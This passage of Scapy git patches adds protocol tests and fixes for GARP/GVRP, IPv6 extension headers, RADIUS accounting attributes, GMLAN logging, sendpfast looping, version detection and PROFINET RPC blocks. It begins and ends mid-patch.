msgs=[GARP_MESSAGE(type = 1, attrs=[GARP_ATTRIBUTE(event='JoinIn')/GMRP_GROUP(addr="00:00:00:00:00:01"), + GARP_ATTRIBUTE(event='JoinIn')/GMRP_GROUP(addr="00:00:00:00:00:02")]), + GARP_MESSAGE(type = 2, attrs=[GARP_ATTRIBUTE(event='JoinIn')/GMRP_SERVICE(event="All Groups"), + GARP_ATTRIBUTE(event='JoinIn')/GMRP_SERVICE(event="All Unregistered Groups")])]) +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 1)[GMRP_GROUP].addr == "00:00:00:00:00:01" +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 2)[GMRP_GROUP].addr == "00:00:00:00:00:02" +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 1)[GMRP_SERVICE].event == 0 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 2)[GMRP_SERVICE].event == 1 +pkt = Dot3(pkt.build()) +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 1)[GMRP_GROUP].addr == "00:00:00:00:00:01" +assert pkt.getlayer(GARP_MESSAGE, 1).getlayer(GARP_ATTRIBUTE, 2)[GMRP_GROUP].addr == "00:00:00:00:00:02" +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 1)[GMRP_SERVICE].event == 0 +assert pkt.getlayer(GARP_MESSAGE, 2).getlayer(GARP_ATTRIBUTE, 2)[GMRP_SERVICE].event == 1 + += GARP from pcap + +pkts = rdpcap(scapy_path("test/pcaps/gvrp.pcapng.gz")) +for p in pkts: + if len(p[GARP_ATTRIBUTE].payload) > 0: + assert p[GVRP] is not None + += GARP tshark check + +import tempfile, os +pkt = Dot3(dst="01:80:c2:00:00:21")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( + msgs=[GARP_MESSAGE(attrs=[GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=1), + GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=2)]), + GARP_MESSAGE(attrs=[GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=3), + GARP_ATTRIBUTE(event='JoinIn')/GVRP(vlan=4)])]) + +fd, pcapfilename = tempfile.mkstemp() +wrpcap(pcapfilename, pkt) +rv = tcpdump(pcapfilename, prog=conf.prog.tshark, getfd=True, args=['-Y', 'gvrp'], dump=True, wait=True) +assert rv != b"" +os.close(fd) +os.unlink(pcapfilename) + += GARP tshark check + +import tempfile, os +pkt = Dot3(dst="01:80:c2:00:00:20")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( + msgs=[GARP_MESSAGE(type = 1, attrs=[GARP_ATTRIBUTE(event='JoinIn')/GMRP_GROUP(addr="00:00:00:00:00:01"), + GARP_ATTRIBUTE(event='JoinIn')/GMRP_GROUP(addr="00:00:00:00:00:02")]), + GARP_MESSAGE(type = 2, attrs=[GARP_ATTRIBUTE(event='JoinIn')/GMRP_SERVICE(event="All Groups"), + GARP_ATTRIBUTE(event='JoinIn')/GMRP_SERVICE(event="All Unregistered Groups")])]) + +fd, pcapfilename = tempfile.mkstemp() +wrpcap(pcapfilename, pkt) +rv = tcpdump(pcapfilename, prog=conf.prog.tshark, getfd=True, args=['-Y', 'gmrp'], dump=True, wait=True) +assert rv != b"" +os.close(fd) +os.unlink(pcapfilename) diff --git a/test/pcaps/gvrp.pcapng.gz b/test/pcaps/gvrp.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..8e0403947187f891b1eb61e2119ffb953194f0cc GIT binary patch literal 372 zcmV-)0gL`0iwFpXetTj717~(}a9?I=cx7ZRaARR`Zf5}F;^pPq!oa}bYojg22&Df* z0TY86gJ)hzYK}&brh;>RQL09Wuckt#xvrssxq*R#b3mwqgMyKsrGdLgm4ZfjW=V!Z zaImY1o{=U412cmNgHL8&X@!ERo}rnZfv%ZuVs46=2@8W2gG*^{L2_b&f<|~|QEG8U zVo|oHg0Y^Np0R?4duEA38H8Psn4F!Mo|>YNSPYTXH3XUq0wA}7-01+N|Nm!TU;?sq zfox77%?6}-aM;fP)dx}&12K+4^)4&J<$31fHb6EAGd3JzU{GXYIGFi|kAcg{iJ5_s zk%@sg5QD|+UHk7))odFiv$LY#i%S97QgE~P)iCc_&d9(6F`I=67!^=G=z5;D`T610lPumT53TA3~4pe{u#v%OrN(ah|^ SzC+T~G8+J8@m7+E1ONal46TU( literal 0 HcmV?d00001 From c8031ecf95658236e1fe275e5afca8b64201e7b4 Mon Sep 17 00:00:00 2001 From: Jianwei Mao Date: Mon, 13 Jun 2022 21:11:42 +0800 Subject: [PATCH 0797/1632] Fix TypeError while building _OptionsField in HBHOptUnknown (#3633) * fix TypeError while building _OptionsField for the HBHOptUnknown of IPv6ExtHdrHopByHop and IPv6ExtHdrDestOpt with autopad=0 --- scapy/layers/inet6.py | 2 +- test/regression.uts | 15 +++++++++++++++ 2 files changed, 16 insertions(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 24dff89cb5c..eb5a50e8dfd 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -823,7 +823,7 @@ def i2m(self, pkt, x): autopad = 1 if not autopad: - return b"".join(map(str, x)) + return b"".join(map(bytes, x)) curpos = self.curpos s = b"" diff --git a/test/regression.uts b/test/regression.uts index a22c5799d48..4fbc49a3b29 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -314,6 +314,21 @@ else: conf.route6.ipv6_ifaces = set([conf.loopback_name]) True += Build HBHOptUnknown for IPv6ExtHdrHopByHop with disabled autopad +~ ipv6 hbh opt +* Build the HBHOptUnknown of IPv6ExtHdrHopByHop with autopad=0 +v6Opt = HBHOptUnknown(otype=3, optlen=7, optdata="Beijing") +pkt = Ether()/IPv6()/IPv6ExtHdrHopByHop(autopad=0, options=[v6Opt, ]) +pkt.build() + += Build HBHOptUnknown for IPv6ExtHdrDestOpt with disabled autopad +~ ipv6 hbh opt +* Build the HBHOptUnknown of IPv6ExtHdrDestOpt with autopad=0 +v6Opt = HBHOptUnknown(otype=3, optlen=6, optdata="Haikou") +pkt = Ether()/IPv6()/IPv6ExtHdrDestOpt(autopad=0, options=[v6Opt, ]) +pkt.build() + + = Test read_routes6() - check mandatory routes conf.route6 From e6b91cf71f1b39f558b8630260d11ff71b88eb18 Mon Sep 17 00:00:00 2001 From: Leandro Lisboa Penz Date: Wed, 25 May 2022 11:54:04 +0100 Subject: [PATCH 0798/1632] Add classes for the missing RFC 2866 RADIUS attributes Add RadiusAttr_Acct_Status_Type, RadiusAttr_Acct_Authentic and RadiusAttr_Acct_Terminate_Cause to scapy/layers/radius.py. The field values are already in _radius_attrs_values, only the the corresponding classes were missing. --- scapy/layers/radius.py | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index af67496975a..2d6794925a7 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -992,6 +992,21 @@ class RadiusAttr_Framed_Protocol(_RadiusAttrIntEnumVal): val = 7 +class RadiusAttr_Acct_Status_Type(_RadiusAttrIntEnumVal): + """RFC 2866""" + val = 40 + + +class RadiusAttr_Acct_Authentic(_RadiusAttrIntEnumVal): + """RFC 2866""" + val = 45 + + +class RadiusAttr_Acct_Terminate_Cause(_RadiusAttrIntEnumVal): + """RFC 2866""" + val = 49 + + class RadiusAttr_NAS_Port_Type(_RadiusAttrIntEnumVal): """RFC 2865""" val = 61 From 453f6ca96d11b95dce0400c8fb04a122d3df66fa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 20 Apr 2022 10:46:59 +0200 Subject: [PATCH 0799/1632] Enhance code coverage of GMLAN logging unit tests --- scapy/contrib/automotive/gm/gmlan.py | 2 +- test/contrib/automotive/gm/gmlan.uts | 130 ++++++++++++++++++++++++++- 2 files changed, 130 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index 54e20fdc226..586b8631b27 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -510,7 +510,7 @@ def answers(self, other): and other.parameterIdentifier == self.parameterIdentifier -bind_layers(GMLAN, GMLAN_DPBA, service=0x6D) +bind_layers(GMLAN, GMLAN_DPBAPR, service=0x6D) # ########################RD################################### diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 6aa503b8c7e..722b2bc974d 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -8,11 +8,12 @@ + Configuration of scapy = Load gmlan layer ~ conf + load_contrib("automotive.ecu", globals_dict=globals()) load_contrib("automotive.gm.gmlan", globals_dict=globals()) from scapy.contrib.automotive.gm.gmlan_ecu_states import * - +from scapy.contrib.automotive.gm.gmlan_logging import * + Basic Packet Tests() = Set GMLAN ECU AddressingScheme @@ -485,3 +486,130 @@ assert resp.CPIDNumber == 20 assert resp.answers(req) assert resp.hashret() == req.hashret() += Logging tests + + +def get_log(pkt): + for layer in pkt.layers(): + if not hasattr(layer, "get_log"): + continue + try: + return layer.get_log(pkt) + except TypeError: + return layer.get_log.im_func(pkt) + +pkt = GMLAN()/GMLAN_RFRD(subfunction=1) +log = get_log(pkt) +assert len(log) == 2 +assert log[1] == "readFailureRecordIdentifiers" +assert log[0] == "ReadFailureRecordData" + +pkt = GMLAN()/GMLAN_RFRDPR(subfunction=1) +log = get_log(pkt) +assert len(log) == 2 +assert log[1] == "readFailureRecordIdentifiers" +assert log[0] == "ReadFailureRecordDataPositiveResponse" + +pkt = GMLAN()/GMLAN_RDBPI(identifiers=[5]) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == '[OBD_EngineCoolantTemperature]' +assert log[0] == "ReadDataByParameterIdentifier" + +pkt = GMLAN()/GMLAN_RDBPIPR(parameterIdentifier=5) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == 'OBD_EngineCoolantTemperature' +assert log[0] == "ReadDataByParameterIdentifierPositiveResponse" + + +pkt = GMLAN()/GMLAN_RDBPKTI(subfunction=0) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == 'stopSending' +assert log[0] == "ReadDataByPacketIdentifier" + +pkt = GMLAN()/GMLAN_RMBA(memoryAddress=0) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == '0x0' +assert log[0] == "ReadMemoryByAddress" + +pkt = GMLAN()/GMLAN_RMBAPR(memoryAddress=0, dataRecord=b"deadbeef") +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1][0] == '0x0' +assert log[1][1] == b'deadbeef' +assert log[0] == "ReadMemoryByAddressPositiveResponse" + +pkt = GMLAN()/GMLAN_DDM(DPIDIdentifier=0, PIDData=b"deadbeef") +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1][0] == '0x0' +assert log[1][1] == b'deadbeef' +assert log[0] == "DynamicallyDefineMessage" + +pkt = GMLAN()/GMLAN_DDMPR(DPIDIdentifier=0) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == '0x0' +assert log[0] == "DynamicallyDefineMessagePositiveResponse" + +pkt = GMLAN()/GMLAN_DPBA(parameterIdentifier=0, memoryAddress=1, memorySize=3) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1][0] == 0 +assert log[1][1] == 1 +assert log[1][2] == 3 +assert log[0] == "DefinePIDByAddress" + +pkt = GMLAN()/GMLAN_DPBAPR(parameterIdentifier=0) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == 0 +assert log[0] == "DefinePIDByAddressPositiveResponse" + +pkt = GMLAN()/GMLAN_WDBI(dataIdentifier=0, dataRecord=b"deadbeef") +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1][0] == "0x0" +assert log[1][1] == b"deadbeef" +assert log[0] == "WriteDataByIdentifier" + +pkt = GMLAN()/GMLAN_WDBIPR(dataIdentifier=0) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == "0x0" +assert log[0] == "WriteDataByIdentifierPositiveResponse" + +pkt = GMLAN()/GMLAN_RDI(subfunction=0x80) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == "readStatusOfDTCByDTCNumber" +assert log[0] == "ReadDiagnosticInformation" + +pkt = GMLAN()/GMLAN_DC(CPIDNumber=0x80) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == "0x80" +assert log[0] == "DeviceControl" + +pkt = GMLAN()/GMLAN_DCPR(CPIDNumber=0x80) +log = get_log(pkt) +print(log) +assert len(log) == 2 +assert log[1] == "0x80" +assert log[0] == "DeviceControlPositiveResponse" \ No newline at end of file From b56a77c7e53d54279ecf9cb3a5a78a36bda8f73f Mon Sep 17 00:00:00 2001 From: ridago Date: Thu, 16 Jun 2022 10:43:38 +0200 Subject: [PATCH 0800/1632] Support loop=0 in sendpfast (#3641) --- scapy/sendrecv.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 88e8d91ed84..2fcb18a6b31 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -489,7 +489,7 @@ def sendpfast(x, # type: _PacketIterable pps=None, # type: Optional[float] mbps=None, # type: Optional[float] realtime=False, # type: bool - loop=0, # type: int + loop=None, # type: Optional[int] file_cache=False, # type: bool iface=None, # type: Optional[_GlobInterfaceType] replay_args=None, # type: Optional[List[str]] @@ -501,7 +501,8 @@ def sendpfast(x, # type: _PacketIterable :param pps: packets per second :param mbps: MBits per second :param realtime: use packet's timestamp, bending time with real-time value - :param loop: number of times to process the packet list + :param loop: number of times to process the packet list. 0 implies + infinite loop :param file_cache: cache packets in RAM instead of reading from disk at each iteration :param iface: output interface @@ -522,7 +523,7 @@ def sendpfast(x, # type: _PacketIterable else: argv.append("--topspeed") - if loop: + if loop is not None: argv.append("--loop=%i" % loop) if file_cache: argv.append("--preload-pcap") From 83e837339dfcf015d225cf88bbfecd0fd28af10d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 16 Jun 2022 17:56:49 +0200 Subject: [PATCH 0801/1632] crypt_key should be bytes (ipsec docstring) fixes https://github.com/secdev/scapy/issues/3623 --- scapy/layers/ipsec.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 39d69809cbc..de54cd42d93 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -19,7 +19,7 @@ Example of use: >>> sa = SecurityAssociation(ESP, spi=0xdeadbeef, crypt_algo='AES-CBC', -... crypt_key='sixteenbytes key') +... crypt_key=b'sixteenbytes key') >>> p = IP(src='1.1.1.1', dst='2.2.2.2') >>> p /= TCP(sport=45012, dport=80) >>> p /= Raw('testdata') From af81fd491165e41ac73037d741b8a4fb75ea9ffd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 16 Jun 2022 23:56:38 +0200 Subject: [PATCH 0802/1632] Reorder version detection First check if we are in a git archive, THEN try to call git THEN use VERSION --- .config/appveyor/InstallNpcap.ps1 | 2 +- scapy/__init__.py | 35 +++++++++++++++++-------------- scapy/main.py | 2 +- test/regression.uts | 26 ++++++++++++++--------- 4 files changed, 37 insertions(+), 28 deletions(-) diff --git a/.config/appveyor/InstallNpcap.ps1 b/.config/appveyor/InstallNpcap.ps1 index ef7e4fb6e65..d8477fd9e1a 100644 --- a/.config/appveyor/InstallNpcap.ps1 +++ b/.config/appveyor/InstallNpcap.ps1 @@ -68,7 +68,7 @@ if ($success -ne 0){ Write-Output ('Installing: ' + $file) # Run installer -$process = Start-Process $file -ArgumentList "/loopback_support=yes /S" -PassThru -Wait +$process = Start-Process $file -ArgumentList "/loopback_support=yes /winpcap_mode=no /S" -PassThru -Wait if($process.ExitCode -eq 0) { echo "Npcap installation completed !" exit 0 diff --git a/scapy/__init__.py b/scapy/__init__.py index b68c0744da7..8d44a9faec4 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -91,6 +91,24 @@ def _version(): :return: the Scapy version """ + # Rely on git archive "export-subst" git attribute. + # See 'man gitattributes' for more details. + # Note: describe is only supported with git >= 2.32.0 + # but we use it to workaround GH#3121 + git_archive_id = '$Format:%h %(describe)$'.strip().split() + sha1 = git_archive_id[0] + tag = git_archive_id[1] + if "Format" not in sha1: + # We are in a git archive + if "describe" in tag: + # git is too old! + tag = "" + if tag: + return _parse_tag(tag) + elif sha1: + return "git-archive." + sha1 + return 'unknown.version' + # Fallback to calling git version_file = os.path.join(_SCAPY_PKG_DIR, 'VERSION') try: tag = _version_from_git_describe() @@ -106,22 +124,7 @@ def _version(): tag = fdsec.read() return tag except Exception: - # Rely on git archive "export-subst" git attribute. - # See 'man gitattributes' for more details. - # Note: describe is only supported with git >= 2.32.0 - # but we use it to workaround GH#3121 - git_archive_id = '$Format:%h %(describe:tags)$'.strip().split() - sha1 = git_archive_id[0] - tag = git_archive_id[1] - if "describe" in tag: - # git is too old ! - tag = None - if tag: - return _parse_tag(tag) - elif sha1: - return "git-archive.dev" + sha1 - else: - return 'unknown.version' + return 'unknown.version' VERSION = __version__ = _version() diff --git a/scapy/main.py b/scapy/main.py index 869409178cc..a3df1238522 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -691,7 +691,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): cfg.TerminalInteractiveShell.confirm_exit = False cfg.TerminalInteractiveShell.separate_in = u'' if int(IPython.__version__[0]) >= 6: - cfg.TerminalInteractiveShell.term_title_format = ("Scapy v%s" % + cfg.TerminalInteractiveShell.term_title_format = ("Scapy %s" % conf.version) # As of IPython 6-7, the jedi completion module is a dumpster # of fire that should be scrapped never to be seen again. diff --git a/test/regression.uts b/test/regression.uts index 4fbc49a3b29..707eaa83aa8 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -46,13 +46,19 @@ assert _version_checker(FakeModule3, (2, 4, 2)) = Check Scapy version +import mock + import scapy from scapy import _parse_tag, _version_from_git_describe +from scapy.config import _version_checker -class GitModuleScapy(object): - __version__ = _version_from_git_describe() +b = Bunch(returncode=0, communicate=lambda *args, **kargs: (b"v2.4.5rc1-261-g44b98e14", None)) +with mock.patch('scapy.subprocess.Popen', return_value=b) as popen: + class GitModuleScapy(object): + __version__ = _version_from_git_describe() -assert _parse_tag("v2.3.2-346-g164a52c075c8") == '2.3.2.dev346' +assert GitModuleScapy.__version__ == '2.4.5rc1.dev261' +assert _version_checker(GitModuleScapy, (2, 4, 5)) = List layers ~ conf command @@ -4674,20 +4680,20 @@ assert pl[1][Ether].dst == '00:22:33:44:55:66' + Scapy version = _version() -~ ci_only import os version_filename = os.path.join(scapy._SCAPY_PKG_DIR, "VERSION") -version = scapy._version() -assert(os.path.exists(version_filename)) +version = "2.0.0" +with open(version_filename, "w") as fd: + fd.write(version) import mock with mock.patch("scapy._version_from_git_describe") as version_mocked: - version_mocked.side_effect = Exception() - assert(scapy._version() == version) - os.unlink(version_filename) - assert(scapy._version() == "git-archive.dev$Format:%h") + version_mocked.side_effect = Exception() + assert(scapy._version() == version) + os.unlink(version_filename) + assert(scapy._version() == "unknown.version") = UTscapy HTML output From be66d017c222d4f3eef2a6dffe92c27997213056 Mon Sep 17 00:00:00 2001 From: atlowl <86038305+atlowl@users.noreply.github.com> Date: Sat, 18 Jun 2022 10:57:13 +1200 Subject: [PATCH 0803/1632] Add PDPortDataAdjust block support (#3435) Add support for decoding the PDPortDataAdjust, and it's collective sub-block types. --- scapy/contrib/pnio_rpc.py | 161 ++++++++++++++++++++++++++++++++++++++ test/contrib/pnio_rpc.uts | 14 ++++ 2 files changed, 175 insertions(+) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index c724638f238..fafa94e27e0 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -276,6 +276,44 @@ 0x4: "RT_CLASS_UDP", } +MAU_TYPE = { + 0x0000: "Radio", + 0x001e: "1000-BaseT-FD" +} + +MAU_EXTENSION = { + 0x0000: "None", + 0x0100: "Polymeric-Optical-Fiber" +} + +LINKSTATE_LINK = { + 0x0000: "Reserved", + 0x0001: "Up", + 0x0002: "Down", + 0x0003: "Testing", + 0x0004: "Unknown", + 0x0005: "Dormant", + 0x0006: "NotPresent", + 0x0007: "LowerLayerDown", +} + +LINKSTATE_PORT = { + 0x0000: "Unknown", + 0x0001: "Disabled/Discarding", + 0x0002: "Blocking", + 0x0003: "Listening", + 0x0004: "Learning", + 0x0005: "Forwarding", + 0x0006: "Broken", + 0x0007: "Reserved", +} + +MEDIA_TYPE = { + 0x00: "Unknown", + 0x01: "Copper cable", + 0x02: "Fiber optic cable", + 0x03: "Radio communication" +} # List of all valid activity UUIDs for the DceRpc layer with PROFINET RPC # endpoint. @@ -846,6 +884,128 @@ class IOCRBlockRes(Block): block_type = 0x8102 +class AdjustLinkState(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding", "", length=2), + XShortEnumField("LinkState", 0, LINKSTATE_LINK), + ShortField("AdjustProperties", 0) + ] + + block_type = 0x021B + + +class AdjustPeerToPeerBoundary(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding1", "", length=2), + IntField("peerToPeerBoundary", 0), + ShortField("adjustProperties", 0), + PadField(ShortField("padding2", 0), 2), + ] + + block_type = 0x0224 + + +class AdjustDomainBoundary(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding1", "", length=2), + IntEnumField("DomainBoundaryIngress", 0, { + 0x00: "No Block", + 0x01: "Block", + }), + IntEnumField("DomainBoundaryEgress", 0, { + 0x00: "No Block", + 0x01: "Block", + }), + ShortField("adjustProperties", 0), + PadField(ShortField("padding2", 0), 2) + ] + + block_type = 0x0209 + + +class AdjustMulticastBoundary(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding1", "", length=2), + IntField("MulticastAddress", 0), + ShortField("adjustProperties", 0), + PadField(ShortField("padding2", 0), 2) + ] + + block_type = 0x0210 + + +class AdjustMauType(Block): + fields_desc = [ + BlockHeader, + PadField(ShortField("padding", 0), 2), + XShortEnumField("MAUType", 1, MAU_TYPE), + ShortField("adjustProperties", 0), + ] + + block_type = 0x020E + + +class AdjustMauTypeExtension(Block): + fields_desc = [ + BlockHeader, + PadField(ShortField("padding", 0), 2), + XShortEnumField("MAUTypeExtension", 0, MAU_EXTENSION), + ShortField("adjustProperties", 0), + ] + + block_type = 0x0229 + + +class AdjustDCPBoundary(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding1", "", length=2), + IntField("dcpBoundary", 0), + ShortField("adjustProperties", 0), + PadField(ShortField("padding2", 0), 2), + ] + + block_type = 0x0225 + + +PDPORT_ADJUST_BLOCK_ASSOCIATION = { + 0x0209: AdjustDomainBoundary, + 0x020e: AdjustMauType, + 0x0210: AdjustMulticastBoundary, + 0x021b: AdjustLinkState, + 0x0224: AdjustPeerToPeerBoundary, + 0x0225: AdjustDCPBoundary, + 0x0229: AdjustMauTypeExtension, +} + + +def _guess_pdportadjust_block(_pkt, *args, **kargs): + cls = Block + + btype = struct.unpack("!H", _pkt[:2])[0] + if btype in PDPORT_ADJUST_BLOCK_ASSOCIATION: + cls = PDPORT_ADJUST_BLOCK_ASSOCIATION[btype] + + return cls(_pkt, *args, **kargs) + + +class PDPortDataAdjust(Block): + fields_desc = [ + BlockHeader, + StrFixedLenField("padding", "", length=2), + XShortField("slotNumber", 0), + XShortField("subslotNumber", 0), + PacketListField("blocks", [], _guess_pdportadjust_block, + length_from=lambda p: p.block_length) + ] + + block_type = 0x0202 + + # ExpectedSubmoduleBlockReq class ExpectedSubmoduleDataDescription(Packet): """Description of the data of a submodule""" @@ -1203,6 +1363,7 @@ class Alarm_High(Packet): "0116": IODControlReq, "0117": IODControlReq, "0118": IODControlReq, + "0202": PDPortDataAdjust, # responses "8101": ARBlockRes, diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 61f57890c69..5ca533a84a4 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -788,3 +788,17 @@ assert(raw(p) == bytearray.fromhex('00020028010000000000000000000000000000000000 = PNIO Alarm PRAL_AlarmItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), PRAL_AlarmItem()]) assert(raw(p) == bytearray.fromhex('0002002e01000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000')) + += PNIO PDPortDataAdjust Decoding +raw = bytearray.fromhex('0402280000000000dea000006c9711d182710001000305f9dea000016' \ + 'c9711d1827100a02442df7d0777bc51ddaa4d07addb7075183fc28b00' \ + '00000000000001000000000002ffffffff007c0000000000000000000' \ + '000680000004000000000000000688009003c0100000002ba501cd47e' \ + '40d3a0b545fd4ac70eb900000000000080020000802f0000002800000' \ + '000000000000000000000000000000000000000000002020024010000' \ + '00000080020224000c010000000000000100000000021b00080100000' \ + '000010000') +p = DceRpc(raw) +assert(p[PDPortDataAdjust].subslotNumber == 0x8002) +assert(p[AdjustPeerToPeerBoundary].peerToPeerBoundary == 0x1) +assert(LINKSTATE_LINK[p[AdjustLinkState].LinkState] == 'Up') From 2bdddedaacd1b486642e9f862b670ecedcb3e051 Mon Sep 17 00:00:00 2001 From: cpackham-atlnz <85916201+cpackham-atlnz@users.noreply.github.com> Date: Sat, 18 Jun 2022 10:58:33 +1200 Subject: [PATCH 0804/1632] Pnio iod read (#3432) * contrib/pnio: Fix tests for PNIO Alarms The PNIO Alarms tests use ProfinetIO but this is defined in scapy.contrib.pnio which wasn't being imported. Import it now so the test run instead of erroring out. Signed-off-by: Chris Packham * contrib/pnio: Add IODReadReq and IODReadRes Similar to IODWriteRe{q,s}. Add support for the IODRead. Signed-off-by: Chris Packham --- scapy/contrib/pnio_rpc.py | 53 +++++++++++++++++++++++++++++++++++++++ test/contrib/pnio_rpc.uts | 47 ++++++++++++++++++++++++++++++++++ 2 files changed, 100 insertions(+) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index fafa94e27e0..d76d6c81d77 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -512,6 +512,53 @@ class IODWriteRes(Block): block_type = 0x8008 +# IODReadRe{q,s} +class IODReadReq(Block): + """IODRead request block""" + fields_desc = [ + BlockHeader, + ShortField("seqNum", 0), + UUIDField("ARUUID", None), + XIntField("API", 0), + XShortField("slotNumber", 0), + XShortField("subslotNumber", 0), + StrFixedLenField("padding", "", length=2), + XShortEnumField("index", 0, IOD_WRITE_REQ_INDEX), + LenField("recordDataLength", None, fmt="I"), + StrFixedLenField("RWPadding", "", length=24), + ] + block_type = 0x0009 + + def payload_length(self): + return self.recordDataLength + + def get_response(self): + res = IODReadRes() + for field in ["seqNum", "ARUUID", "API", "slotNumber", + "subslotNumber", "index"]: + res.setfieldval(field, self.getfieldval(field)) + return res + + +class IODReadRes(Block): + """IODRead response block""" + fields_desc = [ + BlockHeader, + ShortField("seqNum", 0), + UUIDField("ARUUID", None), + XIntField("API", 0), + XShortField("slotNumber", 0), + XShortField("subslotNumber", 0), + StrFixedLenField("padding", "", length=2), + XShortEnumField("index", 0, IOD_WRITE_REQ_INDEX), + LenField("recordDataLength", None, fmt="I"), + XShortField("additionalValue1", 0), + XShortField("additionalValue2", 0), + StrFixedLenField("RWPadding", "", length=20), + ] + block_type = 0x8009 + + F_PARAMETERS_BLOCK_ID = [ "No_F_WD_Time2_No_F_iPar_CRC", "No_F_WD_Time2_F_iPar_CRC", "F_WD_Time2_No_F_iPar_CRC", "F_WD_Time2_F_iPar_CRC", @@ -1390,12 +1437,18 @@ def _guess_block_class(_pkt, *args, **kargs): else: cls = IODWriteReq + elif _pkt[:2] == b'\x00\x09': # IODReadReq + cls = IODReadReq + elif _pkt[:2] == b'\x80\x08': # IODWriteRes if _pkt[34:36] == b'\xe0@': # IODWriteMultipleRes cls = IODWriteMultipleRes else: cls = IODWriteRes + elif _pkt[:2] == b'\x80\x09': # IODReadRes + cls = IODReadRes + # Common cases else: btype = bytes_hex(_pkt[:2]).decode("utf8") diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 5ca533a84a4..f1ebb306803 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -3,6 +3,7 @@ + Syntax check = Import the PNIO RPC layer from scapy.contrib.dce_rpc import * +from scapy.contrib.pnio import * from scapy.contrib.pnio_rpc import * from scapy.libs.six import itervalues @@ -204,6 +205,52 @@ p == IODWriteMultipleRes(ARUUID='01234567-89ab-cdef-0123-456789abcdef', recordDa ]) / conf.padding_layer(b'\xef') +#################################################################### + ++ Check IODReadReq + += IODReadReq default values +bytes(IODReadReq()) == bytearray.fromhex('0009003c010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') + += IODReadReq basic example +bytes(IODReadReq( + ARUUID='01234567-89ab-cdef-0123-456789abcdef', seqNum=1, API=1, slotNumber=2, subslotNumber=3, + index=0x4321) + ) == bytearray.fromhex('0009003c010000010123456789abcdef0123456789abcdef00000001000200030000432100000000000000000000000000000000000000000000000000000000') + += IODReadReq dissection +p = 